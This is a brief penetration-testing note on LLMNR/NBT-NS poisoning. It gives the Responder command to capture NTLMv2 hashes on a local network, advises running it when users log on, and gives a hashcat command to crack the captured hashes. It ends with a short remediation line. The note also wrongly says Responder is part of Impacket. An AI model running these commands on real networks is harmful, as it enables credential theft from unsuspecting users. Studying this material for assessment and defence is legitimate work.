LLMNR Poisoning with Responder

Link-Local Multicast Name Resolution - Respond to a service with a username and password hash

LLMNR Protocol

Security Concerns for NetBIOS and LLMNR Protocols | Crowe LLPCroweUSA

Attack

Run responder in the morning and at lunchtime when users log on and log off. The responder is part of Impacket python library.

python /usr/share/responder/Responder.py -I eth0 -rdw -v

The responder is listening for events related to protocols LLNMR, NBT-NS, and DNS/MDNS. It also spins up many services to attract targets, for example, HTTP, WPAd, SMB, SQL, LDAP, RDP, and so on.

Wait for responses, grab the NTLMNv2 hashes, and crack them using the hashcat.

hashcat -m 5600 gathered-ntlmn-hashes.txt wordlist.txt

Remediation

Disable LLMNR and NetBIOS-NS, use a strong passwords which are hard to crack >14